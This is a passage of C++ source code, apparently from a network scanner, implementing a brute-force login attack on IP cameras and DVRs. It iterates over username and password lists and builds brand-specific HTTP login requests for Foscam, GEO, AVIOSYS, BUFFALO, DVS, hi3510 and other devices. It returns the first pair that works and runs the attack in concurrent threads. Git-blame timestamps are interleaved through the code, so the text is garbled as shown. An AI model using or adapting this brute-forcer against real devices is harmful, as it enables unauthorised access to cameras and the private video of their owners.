negVector . push_back ( " HTTP/1.0 302 Found " ) ;
}
else
{
stt - > doEmitionRedFoundData ( " [_IPCameraBrute] No \" SPEC \" specified! " ) ;
isActive = 0 ;
strcpy ( lps . login , " UNKNOWN " ) ;
return lps ;
} ;
for ( int i = 0 ; i < MaxLogin ; i + + )
{
if ( globalScanFlag = = false ) break ;
if ( strcmp ( loginLst [ i ] , " " ) = = 0 ) continue ;
ZeroMemory ( login , sizeof ( login ) ) ;
strcpy ( login , loginLst [ i ] ) ;
for ( int j = 0 ; j < MaxPass ; j + + )
{
if ( globalScanFlag = = false ) break ;
if ( strcmp ( passLst [ j ] , " " ) = = 0 ) continue ;
ZeroMemory ( pass , sizeof ( pass ) ) ;
strcpy ( pass , passLst [ j ] ) ;
ZeroMemory ( request , sizeof ( request ) ) ;
if ( strcmp ( SPEC , " IPC " ) = = 0 )
{
strcpy ( request , " GET /login.xml?user= " ) ;
strcat ( request , login ) ;
strcat ( request , " &usr= " ) ;
strcat ( request , login ) ;
strcat ( request , " &password= " ) ;
strcat ( request , pass ) ;
strcat ( request , " &pwd= " ) ;
strcat ( request , pass ) ;
strcat ( request , " HTTP/1.1 \r \n Host: " ) ;
strcat ( request , ip ) ;
if ( port ! = 80 ) {
strcat ( request , " : " ) ;
char tbuff [ 16 ] = { 0 } ;
2015-02-24 14:14:32 +00:00
sprintf ( tbuff , " %d " , port ) ;
strcat ( request , tbuff ) ;
2015-02-24 14:00:19 +00:00
} ;
strcat ( request , " \r \n User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 \r \n Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 \r \n Accept-Language: en-US,ru;q=0.9,en;q=0.8 \r \n Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 \r \n Accept-Encoding: text, identity, *;q=0 \r \n Connection: close \r \n \r \n " ) ;
}
else if ( strcmp ( SPEC , " GEO " ) = = 0 )
{
strcpy ( request , " GET /Login.cgi?username= " ) ;
strcat ( request , login ) ;
strcat ( request , " &password= " ) ;
strcat ( request , pass ) ;
strcat ( request , " HTTP/1.1 \r \n Host: " ) ;
strcat ( request , ip ) ;
if ( port ! = 80 ) {
strcat ( request , " : " ) ;
char tbuff [ 16 ] = { 0 } ;
2015-02-24 14:14:32 +00:00
sprintf ( tbuff , " %d " , port ) ;
strcat ( request , tbuff ) ;
2015-02-24 14:00:19 +00:00
} ;
strcat ( request , " \r \n User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 \r \n Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 \r \n Accept-Language: en-US,ru;q=0.9,en;q=0.8 \r \n Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 \r \n Accept-Encoding: text, identity, *;q=0 \r \n Connection: close \r \n \r \n " ) ;
}
else if ( strcmp ( SPEC , " EasyCam " ) = = 0 )
{
strcpy ( request , " GET /login.xml?user= " ) ;
strcat ( request , login ) ;
strcat ( request , " &usr= " ) ;
strcat ( request , login ) ;
strcat ( request , " &password= " ) ;
strcat ( request , pass ) ;
strcat ( request , " &pwd= " ) ;
strcat ( request , pass ) ;
strcat ( request , " HTTP/1.1 \r \n Host: " ) ;
strcat ( request , ip ) ;
if ( port ! = 80 ) {
strcat ( request , " : " ) ;
char tbuff [ 16 ] = { 0 } ;
2015-02-24 14:14:32 +00:00
sprintf ( tbuff , " %d " , port ) ;
strcat ( request , tbuff ) ;
2015-02-24 14:00:19 +00:00
} ;
strcat ( request , " \r \n User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 \r \n Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 \r \n Accept-Language: en-US,ru;q=0.9,en;q=0.8 \r \n Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 \r \n Accept-Encoding: text, identity, *;q=0 \r \n Connection: close \r \n \r \n " ) ;
}
else if ( strcmp ( SPEC , " Foscam " ) = = 0 )
{
strcpy ( request , " GET /cgi-bin/CGIProxy.fcgi?usr= " ) ;
strcat ( request , login ) ;
strcat ( request , " &pwd= " ) ;
strcat ( request , pass ) ;
strcat ( request , " &cmd=logIn&usrName= " ) ;
strcat ( request , login ) ;
strcat ( request , " &pwd= " ) ;
strcat ( request , pass ) ;
strcat ( request , " HTTP/1.1 \r \n Host: " ) ;
strcat ( request , ip ) ;
if ( port ! = 80 ) {
strcat ( request , " : " ) ;
char tbuff [ 16 ] = { 0 } ;
2015-02-24 14:14:32 +00:00
sprintf ( tbuff , " %d " , port ) ;
strcat ( request , tbuff ) ;
2015-02-24 14:00:19 +00:00
} ;
strcat ( request , " \r \n User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 \r \n Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 \r \n Accept-Language: en-US,ru;q=0.9,en;q=0.8 \r \n Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 \r \n Accept-Encoding: text, identity, *;q=0 \r \n Connection: close \r \n \r \n " ) ;
}
else if ( strcmp ( SPEC , " AVIOSYS " ) = = 0 )
{
strcpy ( request , " GET /check_user.html?UserName= " ) ;
strcat ( request , login ) ;
strcat ( request , " &PassWord= " ) ;
strcat ( request , pass ) ;
strcat ( request , " HTTP/1.1 \r \n Host: " ) ;
strcat ( request , ip ) ;
if ( port ! = 80 ) {
strcat ( request , " : " ) ;
char tbuff [ 16 ] = { 0 } ;
2015-02-24 14:14:32 +00:00
sprintf ( tbuff , " %d " , port ) ;
strcat ( request , tbuff ) ;
2015-02-24 14:00:19 +00:00
} ;
strcat ( request , " \r \n User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 \r \n Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 \r \n Accept-Language: en-US,ru;q=0.9,en;q=0.8 \r \n Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 \r \n Accept-Encoding: text, identity, *;q=0 \r \n Connection: close \r \n \r \n " ) ;
}
else if ( strcmp ( SPEC , " BUFFALO " ) = = 0 )
{
strcpy ( request , " POST /rpc/login HTTP/1.1 \r \n Host: " ) ;
strcat ( request , ip ) ;
if ( port ! = 80 ) {
strcat ( request , " : " ) ;
char tbuff [ 16 ] = { 0 } ;
2015-02-24 14:14:32 +00:00
sprintf ( tbuff , " %d " , port ) ;
strcat ( request , tbuff ) ;
2015-02-24 14:00:19 +00:00
} ;
strcat ( request , " \r \n User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 \r \n Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 \r \n Accept-Language: en-US,ru;q=0.9,en;q=0.8 \r \n Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 \r \n Accept-Encoding: text, identity, *;q=0 \r \n Connection: keep-alive " ) ;
int loginLength = strlen ( login ) ;
int passLength = strlen ( pass ) ;
int sz = loginLength + passLength + strlen ( " user=&password= " ) ;
char * passString = new char [ sz + 1 ] ;
ZeroMemory ( passString , sizeof ( passString ) ) ;
strcpy ( passString , " user= " ) ;
strcat ( passString , login ) ;
strcat ( passString , " &password= " ) ;
strcat ( passString , pass ) ;
strcat ( request , " \r \n Content-Length: " ) ;
char tempBuff [ 16 ] = { 0 } ;
2015-02-24 14:14:32 +00:00
sprintf ( tempBuff , " %d " , sz ) ;
strcat ( request , tempBuff ) ;
2015-02-24 14:00:19 +00:00
strcat ( request , " \r \n \r \n " ) ;
strcat ( request , passString ) ;
delete [ ] passString ;
}
else if ( strcmp ( SPEC , " DVS " ) = = 0 )
{
strcpy ( request , " POST /login HTTP/1.1 \r \n Host: " ) ;
strcat ( request , ip ) ;
if ( port ! = 80 ) {
strcat ( request , " : " ) ;
2015-02-24 14:14:32 +00:00
char tbuff [ 16 ] = { 0 } ;
sprintf ( tbuff , " %d " , port ) ;
strcat ( request , tbuff ) ;
2015-02-24 14:00:19 +00:00
} ;
strcat ( request , " \r \n User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 \r \n Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 \r \n Accept-Language: en-US,ru;q=0.9,en;q=0.8 \r \n Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 \r \n Accept-Encoding: text, identity, *;q=0 \r \n Connection: keep-alive " ) ;
int loginLength = strlen ( login ) ;
int passLength = strlen ( pass ) ;
int sz = loginLength + passLength + strlen ( " langs=en&user=&password=&submit=+Login+ " ) ;
char * passString = new char [ sz + 1 ] ;
ZeroMemory ( passString , sizeof ( passString ) ) ;
strcpy ( passString , " langs=en&user= " ) ;
strcat ( passString , login ) ;
strcat ( passString , " &password= " ) ;
strcat ( passString , pass ) ;
strcat ( passString , " &submit=+Login+ " ) ;
strcat ( request , " \r \n Content-Length: " ) ;
char tempBuff [ 16 ] = { 0 } ;
2015-02-24 14:14:32 +00:00
sprintf ( tempBuff , " %d " , sz ) ;
strcat ( request , tempBuff ) ;
2015-02-24 14:00:19 +00:00
strcat ( request , " \r \n \r \n " ) ;
strcat ( request , passString ) ;
delete [ ] passString ;
}
else if ( strcmp ( SPEC , " IPCAM " ) = = 0 )
{
strcpy ( request , " GET /cgi-bin/hi3510/checkuser.cgi?&-name= " ) ;
strcat ( request , login ) ;
strcat ( request , " &-passwd= " ) ;
strcat ( request , pass ) ;
strcat ( request , " &-time=1416767330831 HTTP/1.1 \r \n Host: " ) ;
strcat ( request , ip ) ;
if ( port ! = 80 ) {
strcat ( request , " : " ) ;
char tbuff [ 16 ] = { 0 } ;
2015-02-24 14:14:32 +00:00
sprintf ( tbuff , " %d " , port ) ;
strcat ( request , tbuff ) ;
2015-02-24 14:00:19 +00:00
} ;
strcat ( request , " \r \n User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 \r \n Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 \r \n Accept-Language: en-US,ru;q=0.9,en;q=0.8 \r \n Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 \r \n Accept-Encoding: text, identity, *;q=0 \r \n Connection: close \r \n \r \n " ) ;
}
else if ( strcmp ( SPEC , " IEORFOREFOX " ) = = 0 )
{
strcpy ( request , " POST /logincheck.rsp?type=1 HTTP/1.1 \r \n Host: " ) ;
strcat ( request , ip ) ;
if ( port ! = 80 ) {
strcat ( request , " : " ) ;
char tbuff [ 16 ] = { 0 } ;
2015-02-24 14:14:32 +00:00
sprintf ( tbuff , " %d " , port ) ;
strcat ( request , tbuff ) ;
2015-02-24 14:00:19 +00:00
} ;
strcat ( request , " \r \n User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 \r \n Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 \r \n Accept-Language: en-US,ru;q=0.9,en;q=0.8 \r \n Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 \r \n Accept-Encoding: text, identity, *;q=0 \r \n Connection: keep-alive " ) ;
int loginLength = strlen ( login ) ;
int passLength = strlen ( pass ) ;
int sz = loginLength + passLength + strlen ( " username=&userpwd= " ) ;
char * passString = new char [ sz + 1 ] ;
ZeroMemory ( passString , sizeof ( passString ) ) ;
strcpy ( passString , " username= " ) ;
strcat ( passString , login ) ;
strcat ( passString , " &userpwd= " ) ;
strcat ( passString , pass ) ;
strcat ( request , " \r \n Content-Length: " ) ;
char tempBuff [ 16 ] = { 0 } ;
2015-02-24 14:14:32 +00:00
sprintf ( tempBuff , " %d " , sz ) ;
strcat ( request , tempBuff ) ;
2015-02-24 14:00:19 +00:00
strcat ( request , " \r \n \r \n " ) ;
strcat ( request , passString ) ;
delete [ ] passString ;
} ;
int res = _webLoginSeq ( request , login , pass , ip , port , passCounter , SPEC , negVector ) ;
if ( res = = 1 )
{
isActive = 0 ;
strcpy ( lps . login , loginLst [ i ] ) ;
strcpy ( lps . pass , passLst [ j ] ) ;
return lps ;
}
else if ( res = = - 1 )
{
isActive = 0 ;
strcpy ( lps . login , " UNKNOWN " ) ;
return lps ;
} ;
+ + passCounter ;
} ;
} ;
isActive = 0 ;
strcpy ( lps . login , " UNKNOWN " ) ;
return lps ;
2015-02-26 14:20:37 +00:00
}
2015-03-05 14:29:05 +00:00
lopaStr _IPCameraBLobby ( char * ip , int port , char * SPEC )
2015-02-24 14:00:19 +00:00
{
while ( BrutingThrds > = gMaxBrutingThreads ) Sleep ( 1000 ) ;
2015-03-13 14:27:21 +00:00
BruteUtils : : BConInc ( ) ;
2015-02-24 14:00:19 +00:00
lopaStr res = _IPCameraBrute ( ip , port , SPEC ) ;
2015-03-13 14:27:21 +00:00
BruteUtils : : BConDec ( ) ;
2015-02-24 14:00:19 +00:00
return res ;
2015-02-26 14:20:37 +00:00
}
2015-02-24 14:14:32 +00:00
2015-02-26 14:20:37 +00:00
2015-02-24 14:00:19 +00:00
2015-02-26 14:20:37 +00:00
2015-03-02 14:27:38 +00:00
2015-03-05 14:29:05 +00:00
//int Connector::_ConnectToPort(char *ip, int port, char *hl)
//{
// if(gPingNScan)
// {
// if(_pingMyTarget(ip) == 0)
// {
// return -2;
// };
// };
2015-02-24 14:00:19 +00:00
2015-03-05 14:29:05 +00:00
// std::string buffer;
// int size = 0;
2015-02-24 14:00:19 +00:00
2015-03-05 14:29:05 +00:00
// if(port == 22) size = _SSHLobby(ip, port, &buffer);
// else size = Connector::nConnect(ip, port, &buffer);
2015-02-24 14:00:19 +00:00
2015-03-05 14:29:05 +00:00
// if(size > 0)
// {
// ++Alive;
// ++found;
// stt->doEmitionChangeParsed(QString::number(saved) + "/" + QString::number(found));
2015-02-24 14:00:19 +00:00
2015-03-05 14:29:05 +00:00
// conSTR CSTR;
// CSTR.lowerBuff = new char[size + 1];
// CSTR.size = size;
// memcpy(CSTR.lowerBuff, buffer.c_str(), size);
// memset(CSTR.lowerBuff + size, '\0', 1);
2015-03-02 14:27:38 +00:00
2015-03-05 14:29:05 +00:00
// Lexems lx;
// lx._filler(port, (char *)buffer.c_str(), ip, size, &lx, hl);
2015-02-24 14:00:19 +00:00
2015-03-05 14:29:05 +00:00
// delete []CSTR.lowerBuff;
// CSTR.lowerBuff = NULL;
// };
2015-03-02 14:27:38 +00:00
2015-03-05 14:29:05 +00:00
// return 0;
//}
